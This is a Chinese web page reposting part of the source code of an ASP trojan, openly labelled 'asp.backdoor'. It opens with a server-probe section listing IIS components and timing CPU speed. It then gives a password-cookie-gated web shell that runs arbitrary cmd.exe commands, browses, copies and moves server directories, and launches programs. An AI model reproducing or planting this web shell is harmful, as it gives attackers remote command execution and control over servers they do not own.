<br>■ IIS自带的ASP组件
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr>
<%For i=0 to 10%>
<tr height="18" class=backq>
<td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td>
<td align=left> <%
If Not ObjTotest(i,2) Then
Response.Write "<font color=red><b>×</b></font>"
Else
Response.Write "<font class=fonts><b>√</b></font> <a title='" & ObjTotest(i,3) & "'>" & left(ObjTotest(i,3),11) & "</a>"
End If%></td>
</tr>
<%next%>
</table>
<br>■ 常见的文件上传和管理组件
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr>
<%For i=11 to 15%>
<tr height="18" class=backq>
<td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td>
<td align=left> <%
If Not ObjTotest(i,2) Then
Response.Write "<font color=red><b>×</b></font>"
Else
Response.Write "<font class=fonts><b>√</b></font> <a title='" & ObjTotest(i,3) & "'>" & left(ObjTotest(i,3),11) & "</a>"
End If%></td>
</tr>
<%next%>
</table>
<br>■ 常见的收发邮件组件
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr>
<%For i=16 to 23%>
<tr height="18" class=backq>
<td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td>
<td align=left> <%
If Not ObjTotest(i,2) Then
Response.Write "<font color=red><b>×</b></font>"
Else
Response.Write "<font class=fonts><b>√</b></font> <a title='" & ObjTotest(i,3) & "'>" & left(ObjTotest(i,3),11) & "</a>"
End If%></td>
</tr>
<%next%>
</table>
<br>■ 图像处理组件
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr>
<%For i=24 to 25%>
<tr height="18" class=backq>
<td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td>
<td align=left> <%
If Not ObjTotest(i,2) Then
Response.Write "<font color=red><b>×</b></font>"
Else
Response.Write "<font class=fonts><b>√</b></font> <a title='" & ObjTotest(i,3) & "'>" & left(ObjTotest(i,3),11) & "</a>"
End If%></td>
</tr>
<%next%>
</table>
<br>
<font class=fonts>其他组件支持情况检测</font><br>
在下面的输入框中输入你要检测的组件的ProgId或ClassId。
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<FORM action=<%=rseb%>?q=test.asp method=post id=form1 name=form1>
<tr height="18" class=backq>
<td align=center height=30><input class=input type=text value="" name="classname" size=40>
<INPUT type=submit value=" 确 定 " class=backc id=submit1 name=submit1>
<INPUT type=reset value=" 重 填 " class=backc id=reset1 name=reset1>
</td>
</tr>
</FORM>
</table>
<br>
<font class=fonts>ASP脚本解释和运算速度测试</font><br>
<%
'感谢网际同学录 <a href="http://www.aspcool.com/lanmu/'http://www.5719.net'" target=_blank>http://www.5719.net</a> 推荐使用timer函数
'因为只进行50万次计算,所以去掉了是否检测的选项而直接检测
Response.Write "整数运算测试,正在进行50万次加法运算..."
dim t1,t2,lsabc,thetime,thetime2
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
Response.Write "...已完成!<font color=red>" & thetime & "毫秒</font>。<br>"
Response.Write "浮点运算测试,正在进行20万次开方运算..."
t1=timer
for i=1 to 200000
lsabc= 2^0.5
next
t2=timer
thetime2=cstr(int(( (t2-t1)*10000 )+0.5)/10)
Response.Write "...已完成!<font color=red>" & thetime2 & "毫秒</font>。<br>"
%>
<table class=backq border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450">
<tr height=18 align=center>
<td width=320 rowspan=2>供 对 照 的 服 务 器</td>
<td width=130 colspan=2>完成时间(毫秒)</td>
</tr>
<tr height=18 align=center>
<td width=65>整数运算</td><td width=65>浮点运算</td>
</tr>
<tr height=18>
<td align=left> <a href="<a href="http://www.aspcool.com/lanmu/'http://www.ajiang.net'" target=_blank>http://www.ajiang.net</a>">阿江的个人主机(DDR512M赛扬1.7G,测1次)</a></td><td> 250</td><td> 234</td>
</tr>
<tr height=18>
<td align=left> <a href="<a href="http://www.aspcool.com/lanmu/'http://www.100u.com?come=aspcheck&keyword='" target=_blank>http://www.100u.com?come=aspcheck&keyword=</a>虚拟主机" target="_blank">百优科技100u主机(2003-06-12,测10次,最大值)</a></td><td> 187</td><td> 156</td>
</tr>
<tr height=18>
<td align=left> <a href="<a href="http://www.aspcool.com/lanmu/'http://www.west263.com/index.asp?ads=ajiang'" target=_blank>http://www.west263.com/index.asp?ads=ajiang</a>">西部数码west263主机(2003-06-12,测10次,最大值)</a></td><td> 187</td><td> 177</td>
</tr>
<tr height=18>
<td align=left> <a href="<a href="http://www.aspcool.com/lanmu/'http://www.linkwww.com'" target=_blank>http://www.linkwww.com</a> ">联网科技linkwww主机(2003-06-13,测10次,最大值)</a></td><td> 187</td><td> 171</td>
</tr>
<tr height=18>
<td align=left> <font color=red>您正在使用的这台服务器</font> </td><td><font color=red><%=thetime%></font></td><td> <font color=red><%=thetime2%></font></td>
</tr>
</table>
</BODY>
</HTML>
<%case "p.asp"%>
<%if Request.Cookies("password")="7758521" then %>
<%response.write "<font class=fonts>注意:每次只能执行一个操作</font>" %>
当前时间:<%response.write now()%><BR>程序所在的物理路径:
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
<html>
<title>asp.backdoor </title>
<style>
<!--
table{ font-family: 宋体; font-size: 9pt }
BODY
{
FONT-FAMILY: 宋体;
FONT-SIZE: 9pt
}
TD
{
FONT-SIZE: 9pt
}
.input
{
BORDER: #111111 1px solid;
FONT-SIZE: 9pt;
BACKGROUND-color: #F8FFF0
}
.backs
{
BACKGROUND-COLOR: #3F8805;
COLOR: #ffffff;
}
.backq
{
BACKGROUND-COLOR: #EEFEE0
}
.backc
{
BACKGROUND-COLOR: #3F8805;
BORDER: medium none;
COLOR: #ffffff;
HEIGHT: 18px;
font-size: 9pt
}
.fonts
{
COLOR: #3F8805
}
-->
</STYLE>
<body bgcolor="#C0C0C0" text="#000000">
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder"><tr bgcolor="#EEEEEE" height=18 class="noborder" style='table-layout:fixed; word-break:break-all'><td align=left>
<form action="<%= Request.ServerVariables("URL") %>?q=p.asp" method="post">
<input type=text name=text value="<%=DSnXA %>"> <font class=fonts>输入要浏览的目录,最后要加\</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text1 value="<%=DSnXA1 %>">
copy
<input type=text name=text2 value="<%=DSnXA2 %>"> <font class=fonts>目的地址不要带文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text3 value="<%=DSnXA3 %>">
move
<input type=text name=text4 value="<%=DSnXA4 %>"><font class=fonts> 目的地址不要带文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
路径:<input type=text name=text5 value="<%=DSnXA5 %>" >
程序:<input type=text name=text6 value="<%=DSnXA6 %>" ><font class=fonts> 不可以加参数</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type="text" name="ok" size=55><font class=fonts> CMD命令对话框</font>
</td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type=text name=pathlcx size=55><font class=fonts>路径与文件名</font></td><tr/>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<textarea cols=80 rows=5 name=textlcx >
<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<% ok=Request("ok")
if ok<>"" then response.write oScript.exec ("cmd.exe /c "& ok).stdout.readall
%></textarea>
<input type=submit name=sb value=命令 class=input>
</form></td></tr>
</table>
</center>
<%
Response.Write request.form("cmd") & "<br><br>"
Response.Write strResult
DSnXA = Request.Form("text") '目录浏览
if (DSnXA <> "") then
set shell=server.createobject("shell.application") '建立shell对象
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "<font color=black>" & co.path & "-----" & co.size & "</font><br>"
next
end if
DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") '建立shell对象
set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
DSnXA3 = Request.Form("text3") '目录移动
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") '建立shell对象
set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
DSnXA5 = Request.Form("text5") '执行程序要指定路径
DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") '建立shell对象
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
end if
%>
</body>
<%
end select
function Epass(pass)
temppass=StrReverse(left(pass&"zxcvbnm,./",10))
templen=len(pass)
mmpassword=""
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,"'","B")
end function
%>
一个ASP木马程序的源代码(7)
来源:互连网
作者:佚名
时间:2006-11-07
Tag:
点击:
0
最新评论共有 0 位网友发表了评论
查看所有评论
发表评论